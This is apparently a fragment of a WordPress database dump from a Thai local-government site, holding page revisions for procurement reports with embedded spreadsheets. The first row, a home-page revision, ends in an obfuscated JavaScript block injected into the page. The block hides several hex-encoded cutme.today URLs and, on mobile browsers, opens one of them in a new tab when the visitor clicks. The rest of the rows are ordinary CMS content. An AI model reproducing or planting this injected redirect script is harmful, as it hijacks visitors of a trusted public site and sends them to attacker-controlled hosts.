_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-01 13:44:36','2025-07-01 06:44:36','',14,'http://pakhaeng.ssk.in.th/?p=1546',0,'revision','',0),
(1548,1,'2025-07-01 13:54:32','2025-07-01 06:54:32','<!-- wp:file {\"id\":1544,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุประจำปี-2568.xlsx\"} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-d9ada535-3502-4391-836d-d7e98f89700b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุประจำปี-2568.xlsx\">รายการการจัดซื้อจัดจ้างหรือจัดหาพัสดุประจำปี 2568</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุประจำปี-2568.xlsx\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d9ada535-3502-4391-836d-d7e98f89700b\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:embedpress/google-sheets-block {\"url\":\"https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854\",\"iframeSrc\":\"https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854\\u0026headers=false\"} -->\n<figure class=\"wp-block-embedpress-google-sheets-block ose-google-docs-spreadsheets\"><iframe src=\"https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854&amp;headers=false\" frameborder=\"0\" width=\"600\" height=\"450\" allowfullscreen mozallowfullscreen=\"true\" webkitallowfullscreen=\"true\"></iframe></figure>\n<!-- /wp:embedpress/google-sheets-block -->','รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568','','inherit','closed','closed','','1540-revision-v1','','','2025-07-01 13:54:32','2025-07-01 06:54:32','',1540,'http://pakhaeng.ssk.in.th/?p=1548',0,'revision','',0),
(1550,1,'2025-07-01 13:55:55','2025-07-01 06:55:55','<!-- wp:embedpress/google-sheets-block {\"url\":\"https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854\",\"iframeSrc\":\"https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854\\u0026headers=false\"} -->\n<figure class=\"wp-block-embedpress-google-sheets-block ose-google-docs-spreadsheets\"><iframe src=\"https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854&amp;headers=false\" frameborder=\"0\" width=\"600\" height=\"450\" allowfullscreen mozallowfullscreen=\"true\" webkitallowfullscreen=\"true\"></iframe></figure>\n<!-- /wp:embedpress/google-sheets-block -->','รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568','','inherit','closed','closed','','1540-revision-v1','','','2025-07-01 13:55:55','2025-07-01 06:55:55','',1540,'http://pakhaeng.ssk.in.th/?p=1550',0,'revision','',0),
(1552,1,'2025-07-01 13:58:33','2025-07-01 06:58:33','<!-- wp:embedpress/google-sheets-block {\"url\":\"https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854\",\"iframeSrc\":\"https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854\\u0026headers=false\"} -->\n<figure class=\"wp-block-embedpress-google-sheets-block ose-google-docs-spreadsheets\"><iframe src=\"https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854&amp;headers=false\" frameborder=\"0\" width=\"600\" height=\"450\" allowfullscreen mozallowfullscreen=\"true\" webkitallowfullscreen=\"true\"></iframe></figure>\n<!-- /wp:embedpress/google-sheets-block -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"97361511\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:embedpress/google-sheets-block {\"url\":\"https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854\",\"iframeSrc\":\"https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854\\u0026headers=false\"} -->\n<figure class=\"wp-block-embedpress-google-sheets-block ose-google-docs-spreadsheets\"><iframe src=\"https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854&amp;headers=false\" frameborder=\"0\" width=\"600\" height=\"450\" allowfullscreen mozallowfullscreen=\"true\" webkitallowfullscreen=\"true\"></iframe></figure>\n<!-- /wp:embedpress/google-sheets-block -->\n<!-- /wp:generateblocks/container -->','รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568','','inherit','closed','closed','','1540-revision-v1','','','2025-07-01 13:58:33','2025-07-01 06:58:33','',1540,'http://pakhaeng.ssk.in.th/?p=1552',0,'revision','',0),
(1554,1,'2025-07-01 14:03:27','2025-07-01 07:03:27','<!-- wp:generateblocks/container {\"uniqueId\":\"97361511\",\"isDynamic\":true,\"blockVersion\":4} /-->','รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568','','inherit','closed','closed','','1540-revision-v1','','','2025-07-01 14:03:27','2025-07-01 07:03:27','',1540,'http://pakhaeng.ssk.in.th/?p=1554',0,'revision','',0),
(1556,1,'2025-07-01 14:11:12','2025-07-01 07:11:12','<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"1540_ebbc95-cd\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column1540_ebbc95-cd\"><div class=\"kt-inside-inner-col\"><!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->','รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568','','inherit','closed','closed','','1540-revision-v1','','','2025-07-01 14:11:12','2025-07-01 07:11:12','',1540,'http://pakhaeng.ssk.in.th/?p=1556',0,'revision','',0),
(1557,1,'2025-07-01 14:15:40','2025-07-01 07:15:40','','Default Kit','','publish','closed','closed','','default-kit','','','2025-07-01 14:15:40','2025-07-01 07:15:40','',0,'http://pakhaeng.ssk.in.th/?p=1557',0,'elementor_library','',0),
(1558,1,'2025-07-01 14:16:38','2025-07-01 07:16:38','[embedpress embedpress_embeded_link=\'https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?usp=sharing&amp;ouid=116408890257525538205&amp;rtpof=true&amp;sd=true\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' width=\'1500\' height=\'800\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' align=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' 